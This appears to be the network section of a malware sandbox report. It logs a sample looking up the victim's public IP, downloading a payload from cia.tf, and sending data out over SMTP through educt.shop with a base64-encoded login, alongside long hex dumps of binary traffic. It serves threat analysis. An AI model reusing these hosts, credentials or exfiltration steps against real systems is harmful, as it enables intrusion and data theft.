                                                                                2024-11-25 13:47:40 UTC1369INData Raw: 5b 3a c5 51 82 3f 3d 20 f0 d3 92 6a a4 1b a4 69 42 de aa 9a 99 c3 4a bc 4f d4 d2 27 7c 3a 5f 7a 30 4d 99 32 3a 6a fe cb c5 04 40 52 cf 90 3c 06 03 aa ad f1 ee 60 19 8b 62 69 d1 b7 6f 65 37 31 e5 4a cf 0a 4b 17 7d 5e a6 62 b4 24 ba cb 3d 32 c0 31 82 40 80 64 31 7b 7e 77 8d 44 13 5b a4 69 6d 7d 82 c0 80 cf 75 ac ba 38 61 0b 07 dc 7f 25 62 2f de cf 8a be 27 e0 07 af 8d d5 bc 14 d8 d6 c1 ab 63 15 27 89 fd bd a7 93 9c 07 2a 11 97 18 b6 d4 7c 57 d9 8d 3c 73 d8 0e 75 40 94 3e 50 95 f6 dd 22 fe a7 bc 17 91 e4 56 bc 48 ed 03 47 8e 0a 1f 10 e4 08 88 bc 04 5e 02 5b 03 04 f3 a5 de da 4b a8 c0 10 b6 f4 1e de c6 0f 1a 6f 4e 6e 24 a2 e4 25 c5 04 9b f4 c3 dd a8 4e fc 0d 09 9e bc 18 50 02 32 70 32 0d 28 ff 91 2a 91 cc 3d a8 83 0e db 77 9b cd d5 62 06 2d 83 12 48 51 ac 52
                                                                                Data Ascii: [:Q?= jiBJO'|:_z0M2:j@R<`bioe71JK}^b$=21@d1{~wD[im}u8a%b/'c'*|W<su@>P"VHG^[KoNn$%NP2p2(*=wb-HQR
                                                                                2024-11-25 13:47:40 UTC1369INData Raw: eb aa 36 57 87 bf dc ae 8b b7 e1 87 a2 97 ab 5a a8 4c d5 60 a3 1f 6d 7e 6f 8b ae 9f 54 4a a7 17 fb c3 bb 1e 56 3c e9 9d 9f 18 8c 86 c7 72 2f a9 9a b1 55 4f 4f 4c 3f ea 3b 17 6d c3 ce 66 ae 10 38 1a 32 8b 40 6d d4 dd 7a 20 68 da 21 ac dd 21 af 67 d3 13 ff e5 c2 20 d6 dd 30 a8 ba 66 a4 c5 5b 7f 81 45 e5 e5 58 20 be 63 22 0f 2f 58 4c 8f 76 0c 39 ca cd bc 2b 49 ea 6c d9 2d 13 08 07 29 95 34 35 46 a3 b5 e6 ec b1 22 06 fe c9 e5 18 87 25 51 1d ad df bd be 09 55 fe 23 b2 81 54 9c 74 0f 54 51 4f 2d f0 40 6c 00 c9 f0 e9 7e c9 af 01 28 4a 50 87 59 69 e0 b8 d5 6f 87 20 f2 dc 93 a0 6a c3 2a ff 07 60 c0 65 4a 6d f3 36 d8 21 d8 49 f9 1f 5b d1 58 40 81 db db 2c 6c 09 7e a3 b4 62 74 49 34 ba 81 27 6b 13 93 c9 7d 3e dc 5e 0e 18 ef 65 a9 0d 19 b1 d8 4c 93 e9 6b 80 3c 93 a7
                                                                                Data Ascii: 6WZL`m~oTJV<r/UOOL?;mf82@mz h!!g 0f[EX c"/XLv9+Il-)45F"%QU#TtTQO-@l~(JPYio j*`eJm6!I[X@,l~btI4'k}>^eLk<
                                                                                2024-11-25 13:47:40 UTC1369INData Raw: d0 d7 5c 2c d6 bc 5e c3 84 74 82 de 36 34 c4 85 ff aa b8 96 47 4f cc 27 85 a9 80 0c a1 f6 65 5b 6c 38 3e 17 06 34 95 84 2f 96 0a ee 74 cb 0c 35 92 2c 75 78 61 bc 0a cd 17 32 48 f5 0c ec 46 33 08 14 58 b0 57 8e 06 3f 91 3f cd f0 83 89 4f fd 17 4d 62 cf 4a 6c 38 fa 9d 9d c4 09 f1 52 75 75 cb a2 b8 ce 2e 0a f6 0d 5b 9a 13 8b 0d f5 77 30 65 1c 8e 35 49 3f b5 b6 73 16 f4 77 e4 9e ae 87 74 3c 4d e2 03 db 6c 1e 8e 53 45 01 72 1a 72 30 b7 06 78 cf c5 e9 99 71 70 72 2f a7 d4 8b 22 b8 d2 13 99 8a 90 80 d5 a9 a6 52 c5 e8 de ce 29 2f 1d 02 36 21 c3 33 54 22 21 4b 29 bc bd 5a cd e0 ca a5 ff 30 1c 3f e6 07 99 f4 d5 dd 88 8c 22 08 de 80 ea 36 5b 3f 8d 12 44 15 f0 35 52 1e a4 7f 8d 66 ce e2 cf 1f 81 81 2c ed de b8 1b 1b cc 2a 36 dd 4a 0e 9f e5 09 da 99 f6 a7 a2 65 1e 65
                                                                                Data Ascii: \,^t64GO'e[l8>4/t5,uxa2HF3XW??OMbJl8Ruu.[w0e5I?swt<MlSErr0xqpr/"R)/6!3T"!K)Z0?"6[?D5Rf,*6Jee
                                                                                2024-11-25 13:47:40 UTC1369INData Raw: 31 ae 58 6d b7 87 f4 fc 09 60 c0 ca 2d 0a 87 af a8 1b 9f b2 ba 5d 34 e9 35 0d c5 1d ce 33 36 53 65 dc cd 37 0c ef 29 73 1d 87 3e 3b 90 e8 10 8f cc 92 4f ef 75 84 3b 6c 12 64 8f 2b 0b 2e 0b 45 e4 59 3e 8e 25 52 a1 fd 09 5a c6 14 bc 98 ca 55 fa a1 2c 15 ce 43 6d 1f 06 3e 4f 37 78 9d bf 53 b5 2e 5a c0 ca 20 cd 2b 13 fd c2 0a 43 2e 88 9c 15 b3 4d 73 ab 9e c3 82 63 5e 94 ec 69 18 26 cc 02 d5 ca 01 1b 7f 49 c3 5c dc 3f 17 38 cc 8f 8b 48 ab b5 4d 67 c0 fb a7 ea 8c 8c 16 0a c2 c5 a9 a8 02 67 8e 4d 2b e7 b2 78 ee 52 9f 8a 1c 26 e3 5b 2c ff 99 97 86 29 d8 c6 75 b8 ac 3c f9 90 26 5c f1 0b d2 53 38 2b 16 86 46 00 18 bc c9 0d 61 11 f2 15 31 ea d4 fb 76 ae ca 31 f8 37 3f db 50 88 23 26 24 cb 60 e8 41 4e ad 0c ae db d9 7c d4 2e 05 a7 dd 52 1a c6 b4 f1 00 de 9a b3 ca eb
                                                                                Data Ascii: 1Xm`-]4536Se7)s>;Ou;ld+.EY>%RZU,Cm>O7xS.Z +C.Msc^i&I\?8HMggM+xR&[,)u<&\S8+Fa1v17?P#&$`AN|.R
                                                                                2024-11-25 13:47:40 UTC1369INData Raw: c0 32 9f ae e8 9e 5b 7c 75 88 bd 80 27 1d 04 8e d4 8f 4f 74 f5 3b cd 4a 39 44 aa 8f e9 ce 84 e7 f7 67 05 65 0e 40 08 68 d8 c5 43 50 d4 8f a9 a9 63 bb f6 e2 a7 45 bd 08 60 44 2c fc b5 9e 71 68 65 ab 10 08 3d 87 70 96 97 74 7d 41 bb fb 31 ff ed 4e 23 35 6f 7e c4 da a7 79 06 1b bc 21 77 3b 69 c2 88 10 de 8e 6a 9d ba 2b 1b a3 30 4f 64 4b 26 8a 2d 9b 48 2c 76 af d5 b5 d0 46 fd f5 9e 7e 1c a2 3b e0 45 70 ea e1 4e ae 0c fd 0d 91 c7 8f ed 73 5a 57 4f 46 86 f6 08 1d ef b0 46 01 c2 71 ab 19 40 23 73 e3 5d 67 9c 26 57 cb 1f 6a 79 ef 35 a9 64 7f 5d 52 2f 39 ac 73 47 1b fa ef a9 f1 77 7d 32 c1 38 ed 59 d8 e2 7a 33 49 13 07 b4 1f 4b 76 a9 97 aa 24 1d 20 3b cf 82 6b b8 01 b1 6f 27 66 e7 75 be da 21 de 1f 95 b2 02 3d 5a bd 81 4a 38 07 e1 d8 50 84 ae b9 d5 61 31 58 84 ca
                                                                                Data Ascii: 2[|u'Ot;J9Dge@hCPcE`D,qhe=pt}A1N#5o~y!w;ij+0OdK&-H,vF~;EpNsZWOFFq@#s]g&Wjy5d]R/9sGw}28Yz3IKv$ ;ko'fu!=ZJ8Pa1X


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.449740104.26.13.2054437912C:\Users\user\Desktop\Ref#2056119.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-11-25 13:47:40 UTC155OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                Host: api.ipify.org
                                                                                Connection: Keep-Alive
                                                                                2024-11-25 13:47:41 UTC398INHTTP/1.1 200 OK
                                                                                Date: Mon, 25 Nov 2024 13:47:41 GMT
                                                                                Content-Type: text/plain
                                                                                Content-Length: 11
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                cf-cache-status: DYNAMIC
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e82178def3c0f6d-EWR
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2611&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4182&recv_bytes=769&delivery_rate=230629&cwnd=252&unsent_bytes=0&cid=0577f0e3e04f5444&ts=505&x=0"
                                                                                2024-11-25 13:47:41 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                Data Ascii: 8.46.123.75


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.449747172.67.129.1784437236C:\Users\user\AppData\Roaming\ishon.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-11-25 13:47:51 UTC92OUTGET /fef4b8b5d2edef77f163d9b5ed69e2ea.vdf HTTP/1.1
                                                                                Host: cia.tf
                                                                                Connection: Keep-Alive
                                                                                2024-11-25 13:47:52 UTC956INHTTP/1.1 200 OK
                                                                                Date: Mon, 25 Nov 2024 13:47:51 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 1127432
                                                                                Connection: close
                                                                                accept-ranges: bytes
                                                                                Cache-Control: public, max-age=0
                                                                                content-disposition: attachment; filename="Dhykdmlsc.vdf"
                                                                                etag: W/"113408-19362e45d6a"
                                                                                last-modified: Mon, 25 Nov 2024 10:35:53 GMT
                                                                                x-powered-by: Express
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qjQTGe4eRaeRp0DKYF5tRbdts3tXQx2E0kLqaFpjdu3M533cuT8VY3qsVQkxbOI3qifTYSEoqhKGwdHCX3j9KOQ6h5H7aad6928KmjZ9rMJquNdF44vA%2Ffc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e8217ced9900f89-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1547&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4156&recv_bytes=706&delivery_rate=200329&cwnd=235&unsent_bytes=0&cid=c83eda0111646f15&ts=982&x=0"
                                                                                2024-11-25 13:47:52 UTC413INData Raw: 17 10 9e 68 50 d7 40 e0 46 27 2a 8b 31 0f 2b 36 e9 67 6e 9c 96 60 58 78 bc 6b c3 1d 44 35 20 17 9b 57 f4 42 c1 51 55 05 da 44 cb fc 7a 35 71 c1 7c 03 f9 de 00 c6 1a 63 12 8a 68 e9 38 e3 99 36 dd bd 53 7f 7d 53 30 27 26 0a ce 1b c2 65 f2 bc 2f 70 98 11 98 20 9e b2 c6 78 a9 4d 79 91 fa 11 26 f4 5f c7 14 4b bc 42 d1 8b 1f e3 9f d5 9c 43 cd 7a f4 fb a3 dc a0 4a f3 39 b4 e2 49 22 37 6f 1c 06 bb 56 e0 f2 43 d9 75 7d c1 cd 8d d7 be 14 91 14 44 9d 32 1e cd bb 92 b9 9d b5 56 00 85 18 5f 77 b3 68 bc 3a 60 72 9f e2 85 67 a1 99 0d 0d af a6 56 89 8c 03 e5 35 a1 60 62 8d 2c 09 e5 27 3f 1c fe 74 c4 9a 15 b4 16 0e 68 d5 67 7f df 9f 6b d9 f9 7f 9f 76 41 ad d5 55 d0 c2 11 6f f1 36 b2 aa 8c 1b e6 8b df 4f 1a fc 58 68 d1 10 67 5a 31 97 22 bd 50 4f 9c 0f e6 77 e8 56 8b 23 d0
                                                                                Data Ascii: hP@F'*1+6gn`XxkD5 WBQUDz5q|ch86S}S0'&e/p xMy&_KBCzJ9I"7oVCu}D2V_wh:`rgV5`b,'?thgkvAUo6OXhgZ1"POwV#
                                                                                2024-11-25 13:47:52 UTC1369INData Raw: 11 40 0e d1 73 4f b9 a9 40 02 2c 0b a3 a8 15 2a 8e 57 ce ab d6 6a 4d d0 0f f9 b1 be 6c 25 70 c8 9a aa 87 95 20 f8 b9 84 68 7b 51 27 5e a0 31 3c 4a ef 28 c8 de 68 f8 d7 7e a5 4a 55 4a ab bc 30 f0 09 8e f0 0d 9c 16 1a a6 93 dc 14 79 4f c6 ba 1d d7 b1 7c 38 5d cc b9 72 bc c6 da 73 50 a6 78 e1 b9 52 75 68 f2 5b ef 32 e9 ad 4f 0d 8f c8 78 28 d2 17 6a 02 4a 7a 0a 83 2d e8 18 26 f7 fd 3f 33 2b 05 b8 74 9c 3b 01 55 cd 35 a1 9a 7f 25 5c ac ad 83 d4 be 58 af ae 65 00 14 dc 9c c0 53 f1 80 c7 a2 65 71 e2 6b 47 b2 98 df c3 52 3a 63 c0 19 fb cd 00 1d f6 e5 83 22 2d 55 9b e5 89 89 8f 6a 32 cd 6d 97 f1 7b 21 0d fc cc 89 83 70 3b 2d d0 df 78 32 de 35 02 ac a2 c3 43 6a fd 3b 43 60 ee f7 23 04 cb 79 6b e2 5f 4d 28 8b 33 db a2 3d 62 b4 7b b3 5a ee 2f 23 da d0 1b 4a bf 4d b7
                                                                                Data Ascii: @sO@,*WjMl%p h{Q'^1<J(h~JUJ0yO|8]rsPxRuh[2Ox(jJz-&?3+t;U5%\XeSeqkGR:c"-Uj2m{!p;-x25Cj;C`#yk_M(3=b{Z/#JM
                                                                                2024-11-25 13:47:52 UTC1369INData Raw: 79 86 43 f1 c3 fa 1d 9d a8 63 7e 13 b9 4f 6a 43 07 d0 48 b4 bf 0f a4 df 78 34 6e a8 6d fb ff a4 34 06 c6 01 00 e0 5c d5 d3 aa 96 d6 61 41 c2 13 e3 ed 2b 84 6f c2 e8 d3 41 13 cd bf 8c 1f c6 f1 72 3b 59 34 26 ee dc e6 61 12 18 db 56 3f 70 99 47 71 29 48 28 1f 0a b5 ba 4f 23 0d 1b ac 77 5c 27 bb 7d c1 74 82 f4 6f 8d a4 6b 72 a2 89 bf bc 52 8a bc 52 5c 01 5d 09 f8 8e d6 4f a4 9e a8 87 87 6a f1 0f 93 ea e5 df 16 bf 72 50 91 9c b3 b7 15 58 02 36 a1 cd 5f 64 28 ad b0 3b 72 ba 2a e1 fe da 1d cd 61 d0 99 94 11 67 34 fd 05 61 5c 4c 4c 7e 2f 66 16 b1 f0 53 0d b2 e1 36 73 a6 f0 23 ef 52 c3 b2 75 3e 3d e5 d6 8c e8 b1 1f c4 e6 35 c7 21 4e c9 5d d8 5c e8 ca 1c d5 38 aa a1 1d 0b 9f e8 cb 0a 54 f4 bf 44 d4 4f cf 1f ca c7 33 b8 4e 90 00 84 42 bc 0b bd e6 58 6a 07 51 26 8f
                                                                                Data Ascii: yCc~OjCHx4nm4\aA+oAr;Y4&aV?pGq)H(O#w\'}tokrRR\]OjrPX6_d(;r*ag4a\LL~/fS6s#Ru>=5!N]\8TDO3NBXjQ&
                                                                                2024-11-25 13:47:52 UTC1369INData Raw: e8 a7 43 21 3a be 5d 81 4f 25 36 6e a0 97 ba d0 36 2d 5d a8 cf 97 49 1a e7 ae 6d a9 4c 84 f8 80 62 cc ba 71 9d 13 aa 14 96 6e 33 4b d3 ea b3 b1 6e dc bf 6b f6 0f e2 49 e6 2d 25 42 b4 8d 6c de 19 5c 82 86 23 b8 38 15 b2 28 63 56 a8 bb d0 a6 f9 a2 34 32 66 a9 c4 e5 db 29 75 53 de a9 15 86 3c c1 e6 c9 af 32 ba 65 fe de 0a 9e 34 b0 0f 8f d3 76 31 c5 68 07 ce 17 8e 54 62 75 74 63 67 06 7c 0f aa 93 c9 ef f2 1d 8a 35 2c a2 85 e9 3f f3 c2 1c b9 e7 78 c3 98 f9 81 88 a3 2c 1d 23 38 e6 30 08 a1 61 46 99 5f bf 0f b7 cf ba 1d ef 68 96 52 eb a5 5e 70 1a c7 b7 11 64 29 61 6a 98 03 30 bd e0 1d e2 05 86 0c 8a a7 78 ed a7 3c 15 4d e1 28 7f b0 ba 32 31 83 55 61 a2 db 07 68 c2 65 bc b3 a5 4d e5 fa 29 3f ce 2e 98 95 c9 b8 b7 a4 ba c9 25 d9 50 dd 56 ba 6f 19 32 32 85 ea bb b2
                                                                                Data Ascii: C!:]O%6n6-]ImLbqn3KnkI-%Bl\#8(cV42f)uS<2e4v1hTbutcg|5,?x,#80aF_hR^pd)aj0x<M(21UaheM)?.%PVo22
                                                                                2024-11-25 13:47:52 UTC1369INData Raw: 79 99 d0 8b 71 a9 b0 41 50 03 fb f6 f5 06 00 05 f0 e0 27 f0 d5 52 2f fa 6f 57 53 f7 00 72 d9 40 b6 07 07 c0 be 70 d6 2b 71 39 46 50 4d 00 12 33 a0 8e 1c 09 ef 94 68 a7 b6 e5 52 fd 7e 47 c1 87 3d 62 12 d5 c8 6d ad 4f 98 ec 35 23 31 a4 88 10 51 6e e5 49 ba 2e af ef cd 03 b6 e7 1e 90 65 c7 3f ff 41 ab b8 76 ee 48 b8 ce aa 52 ce f8 bf 57 a6 8b 30 1d 5a 54 e4 73 17 ec 8c 94 6f 9a de 19 b4 fc 1f 68 cf 4e 69 f5 36 df 0e 35 af 65 8a 28 35 b0 82 6a 2e 58 b8 c0 47 8b f7 63 d5 9c ac e3 af 4e 5f 2a 1b 39 89 30 1b 91 54 98 f0 bf 0d 58 75 fc b9 8e ae ef 83 9c b2 01 2f ba fd f3 44 53 ac 18 f7 8d 2b 2b 88 a5 78 43 4d c6 64 6f 18 5a 12 f1 98 9c fd a2 ed 60 68 32 08 8b 3a 2a 0c de a6 5f dd 54 f5 cf 9a 88 3e 60 1c 7c 93 54 77 2a 05 b9 fa b7 10 c7 7e 2e 98 86 1d 19 49 70 cd
                                                                                Data Ascii: yqAP'R/oWSr@p+q9FPM3hR~G=bmO5#1QnI.e?AvHRW0ZTsohNi65e(5j.XGcN_*90TXu/DS++xCMdoZ`h2:*_T>`|Tw*~.Ip
                                                                                2024-11-25 13:47:52 UTC1369INData Raw: 34 5b 74 9c db 4e ee b4 78 19 a1 b2 ee 45 c0 63 6a 7a ab 2d eb 4f 8b d6 33 67 b3 74 74 2c 07 84 f2 17 37 04 52 d9 39 69 72 86 90 70 ac 13 5f c8 cb 96 7e dc be 15 2c 25 cc 34 28 fb 0d 77 da 5f 0d a3 49 c0 a6 37 ff 7f 14 84 4f 95 a7 c0 aa 9a 02 f1 69 1e e2 b9 65 05 db 6a 63 fe 32 2d 4c d1 de 81 9b 8f b6 58 1b 5c 39 21 77 49 21 59 53 30 89 10 d0 64 d0 13 be 9f 97 23 21 3c 7d e7 d5 2b 5a 5c 83 ca 84 df ec 26 1c 43 9f 3d 78 1f 52 c8 6a 70 27 d1 3c 62 cb 80 b1 e4 14 d6 e4 8c 54 f6 16 79 64 c6 69 0a 70 74 6a 77 37 71 d0 e5 e7 5d 3b 62 08 b3 d9 a8 da 5a 34 76 0e e7 0b 55 a7 11 c2 03 cd 94 55 ef 9f 61 2e e7 43 af 0b 71 b6 84 20 2c a0 6e ae 1b 0d 76 e5 51 ae 0d 2d 95 9c 85 02 c1 b5 16 ce cb 40 9e 00 5b 7a 94 36 eb 7e 15 93 96 22 ff d8 d8 3f 77 fb 99 e8 4a 0d 2c 05
                                                                                Data Ascii: 4[tNxEcjz-O3gtt,7R9irp_~,%4(w_I7Oiejc2-LX\9!wI!YS0d#!<}+Z\&C=xRjp'<bTydiptjw7q];bZ4vUUa.Cq ,nvQ-@[z6~"?wJ,
                                                                                2024-11-25 13:47:52 UTC1369INData Raw: 75 0a 4a 2b 9d 24 35 21 ca e8 58 f8 ac e6 8c bb ff 77 73 09 b8 88 6c 50 58 7b 42 6c ce 68 4e e1 61 b5 33 48 08 26 61 a2 0a 07 c5 a0 cc d2 46 47 c5 56 65 08 62 55 cc 92 49 70 fe 9c 86 ba f5 95 bc c8 85 df 3a b4 a9 6b 98 e9 59 88 11 4e 33 19 69 fa 37 99 2e ba 67 1e ff d3 82 5d 6c f2 3f 51 c2 e3 46 ac de e5 19 e0 b9 b8 23 7f 05 9d ec 42 af 1f f7 8e 42 7a 9e 49 cf 67 35 68 f1 09 9b e4 91 e7 83 90 22 f5 ea d3 64 4c 28 b0 c5 d3 ed 02 2b 91 25 29 49 41 18 d4 f3 c4 03 61 f7 5c 14 73 94 61 d3 55 56 50 6c 43 c9 77 81 f0 2e 9d 53 5a 80 0b 67 a5 7a 77 9c 60 56 14 c0 dd 7d 00 3a 7b a8 43 57 32 08 89 2b f5 ae a8 a7 ce 4e ea 23 10 d7 28 23 90 73 50 26 34 dd 30 60 5a 57 29 c9 9d 4b 1f 2b 34 c8 5d 2d 09 ab 0a 76 db aa e6 9e 6a 2e 71 6e fa fd 71 96 10 02 f2 01 03 94 66 b4
                                                                                Data Ascii: uJ+$5!XwslPX{BlhNa3H&aFGVebUIp:kYN3i7.g]l?QF#BBzIg5h"dL(+%)IAa\saUVPlCw.SZgzw`V}:{CW2+N#(#sP&40`ZW)K+4]-vj.qnqf
                                                                                2024-11-25 13:47:52 UTC1369INData Raw: cf 7e 55 dd e2 c6 1f 24 d6 7a 97 a4 f5 e6 51 13 a1 b1 b5 91 84 00 2c 41 25 c7 e6 a5 f3 6d bc 36 fc d4 79 df 2d ca e1 7a 6a 64 e8 12 14 39 0d e8 d4 b3 55 2b 41 27 4d 6e 06 22 a6 41 5c 2a 60 aa 9b 57 57 f2 89 99 e8 c0 1f e1 f0 80 ff d9 a5 67 01 b2 15 ed eb 79 66 ea 36 8d 0c 11 c4 e6 6d 06 29 e2 a0 54 95 98 d1 27 e5 b8 9c 84 42 d6 1f fd 03 a3 55 c6 98 e4 f9 57 7f c9 0d c6 51 17 08 e8 33 16 39 37 0e 00 18 e3 fc 5b 86 a3 61 b5 4a 28 6e 26 2f 42 22 05 18 bc a9 54 56 a5 e3 e7 9a e4 fb 8c 42 67 0a fa f3 96 ea 9c b1 b2 b9 06 d0 53 8d db f9 a6 81 b8 e2 b5 97 0a c8 db bd f2 71 48 7b 00 c9 b7 20 00 2b a4 17 3e bb 22 b4 c1 4b b4 de d3 cc 38 d9 80 f0 db 8c a2 fa 06 5a d9 16 88 5f b0 2e 8a 28 84 de c0 20 ae 99 e7 8c 01 3f c4 b9 4c 26 2c 18 c8 c6 68 07 8d e5 c8 97 9f aa
                                                                                Data Ascii: ~U$zQ,A%m6y-zjd9U+A'Mn"A\*`WWgyf6m)T'BUWQ397[aJ(n&/B"TVBgSqH{ +>"K8Z_.( ?L&,h
                                                                                2024-11-25 13:47:52 UTC1369INData Raw: e7 87 08 88 71 82 18 f7 d3 a1 9f 55 7e 9d 77 19 03 fe 88 fd 66 32 c5 e8 f2 c2 70 29 f3 14 c1 74 20 70 ac 0f d6 dc 3c 38 2b 3f 36 29 52 ff 39 22 34 37 57 36 10 f9 08 3d 54 2f 3c 4d 0f 97 d5 37 2b a9 cd 4a be 9f 38 19 e1 30 6a c5 eb 10 d2 4d f3 9d 56 a9 de 13 51 01 f8 53 9d df 9c 05 7c ca 05 34 9c c1 2f b6 41 cc 57 d6 d8 55 a7 2a df 3a ed d5 f8 13 9b 71 29 95 b6 bb 4d 25 48 34 c2 02 db e0 9d c4 ac ff 75 09 71 ae 9a 66 77 69 6f d7 a5 0f df ae 06 3a da 4c 53 c8 f7 2d 94 e4 a1 f9 bf 81 e4 db 97 2e e7 6f 1b 5e a6 53 ad 6e a2 89 e4 47 61 b1 6b 7b 2b 3f f9 35 6b 5f 29 c5 5f d4 fa 86 58 39 b2 e8 a1 28 6f 11 f1 16 b6 8e 70 70 97 1f ae be e9 17 db 77 23 6a a4 16 42 2b 88 e6 a8 df c4 f3 4f 0d 26 ab 81 45 7e ba e8 2c 14 40 fd f7 0b a1 4d c1 df 6e f1 a7 38 e7 39 7b 30
                                                                                Data Ascii: qU~wf2p)t p<8+?6)R9"47W6=T/<M7+J80jMVQS|4/AWU*:q)M%H4uqfwio:LS-.o^SnGak{+?5k_)_X9(oppw#jB+O&E~,@Mn89{0
                                                                                2024-11-25 13:47:52 UTC1369INData Raw: 49 85 14 2f ca 4c 0c d2 bf 47 45 86 b6 6a 82 f2 4e 61 98 a5 80 9d 3d b2 6d 3c 23 80 34 ca 7c 66 ed 2e 35 39 4c fb fd aa 28 d9 ef 47 d0 b2 36 fa 2b 05 08 41 be fc 2f 4f 01 da b6 c4 fb 17 42 31 be 90 e4 c1 e4 e8 d8 c7 b1 4d 6a 83 f6 fc 5e 30 18 aa 68 2b 22 ba 1f e4 5e 9d 2c f2 6c 59 b9 2a 19 04 8b 13 77 2f a8 61 ff 56 21 0e c6 10 26 70 fd b9 8b ea 3b f4 06 85 3d 76 95 a7 5c f0 53 1f b5 e7 92 de c8 49 9f d2 a5 70 fa ad 6e 15 28 f9 54 e5 f2 6c b5 75 57 07 ba 28 e0 37 26 85 55 18 fa 6b eb d7 41 6a f8 95 4c ce c0 0a 1a 7e e6 d4 c7 01 72 52 cf 1f 4e 98 27 61 18 fc f6 3c 91 33 42 e6 63 de b7 f1 f1 79 2f 5d 49 0b 7b cc 8e d1 a9 42 8a 99 50 02 13 2f 56 c9 35 7e 1b 3f a7 1b 56 e8 ad 25 d8 79 3e 5e db b9 44 41 25 fb 9b d5 d4 cc 9f d0 02 c6 f6 ff f3 2c 95 d9 0a 0a 20
                                                                                Data Ascii: I/LGEjNa=m<#4|f.59L(G6+A/OB1Mj^0h+"^,lY*w/aV!&p;=v\SIpn(TluW(7&UkAjL~rRN'a<3Bcy/]I{BP/V5~?V%y>^DA%,


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.449750104.26.13.2054434588C:\Users\user\AppData\Roaming\ishon.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-11-25 13:48:07 UTC155OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                Host: api.ipify.org
                                                                                Connection: Keep-Alive
                                                                                2024-11-25 13:48:08 UTC399INHTTP/1.1 200 OK
                                                                                Date: Mon, 25 Nov 2024 13:48:07 GMT
                                                                                Content-Type: text/plain
                                                                                Content-Length: 11
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                cf-cache-status: DYNAMIC
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e821835cdbc5e67-EWR
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1831&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1616832&cwnd=242&unsent_bytes=0&cid=c8b0f04fb228a8eb&ts=452&x=0"
                                                                                2024-11-25 13:48:08 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                Data Ascii: 8.46.123.75


                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                Nov 25, 2024 14:47:43.534679890 CET58749743162.254.34.31192.168.2.4220 server1.educt.shop127.0.0.1 ESMTP Postfix
                                                                                Nov 25, 2024 14:47:43.534954071 CET49743587192.168.2.4162.254.34.31EHLO 888683
                                                                                Nov 25, 2024 14:47:44.193017960 CET58749743162.254.34.31192.168.2.4250-server1.educt.shop127.0.0.1
                                                                                250-PIPELINING
                                                                                250-SIZE 204800000
                                                                                250-ETRN
                                                                                250-STARTTLS
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-AUTH=PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250-DSN
                                                                                250 CHUNKING
                                                                                Nov 25, 2024 14:47:44.194449902 CET49743587192.168.2.4162.254.34.31AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
                                                                                Nov 25, 2024 14:47:44.320883989 CET58749743162.254.34.31192.168.2.4250-server1.educt.shop127.0.0.1
                                                                                250-PIPELINING
                                                                                250-SIZE 204800000
                                                                                250-ETRN
                                                                                250-STARTTLS
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-AUTH=PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250-DSN
                                                                                250 CHUNKING
                                                                                Nov 25, 2024 14:47:44.609549999 CET58749743162.254.34.31192.168.2.4334 UGFzc3dvcmQ6
                                                                                Nov 25, 2024 14:47:45.047142982 CET58749743162.254.34.31192.168.2.4235 2.7.0 Authentication successful
                                                                                Nov 25, 2024 14:47:45.047409058 CET49743587192.168.2.4162.254.34.31MAIL FROM:<sendxambro@educt.shop>
                                                                                Nov 25, 2024 14:47:45.450973988 CET58749743162.254.34.31192.168.2.4250 2.1.0 Ok
                                                                                Nov 25, 2024 14:47:45.452688932 CET49743587192.168.2.4162.254.34.31RCPT TO:<ambro@educt.shop>
                                                                                Nov 25, 2024 14:47:45.865268946 CET58749743162.254.34.31192.168.2.4250 2.1.5 Ok
                                                                                Nov 25, 2024 14:47:45.865684986 CET49743587192.168.2.4162.254.34.31DATA
                                                                                Nov 25, 2024 14:47:46.266216040 CET58749743162.254.34.31192.168.2.4354 End data with <CR><LF>.<CR><LF>
                                                                                Nov 25, 2024 14:47:46.269850016 CET49743587192.168.2.4162.254.34.31.
                                                                                Nov 25, 2024 14:47:46.782505989 CET58749743162.254.34.31192.168.2.4250 2.0.0 Ok: queued as A319276F37
                                                                                Nov 25, 2024 14:48:10.597456932 CET58749757162.254.34.31192.168.2.4220 server1.educt.shop127.0.0.1 ESMTP Postfix
                                                                                Nov 25, 2024 14:48:10.600487947 CET49757587192.168.2.4162.254.34.31EHLO 888683
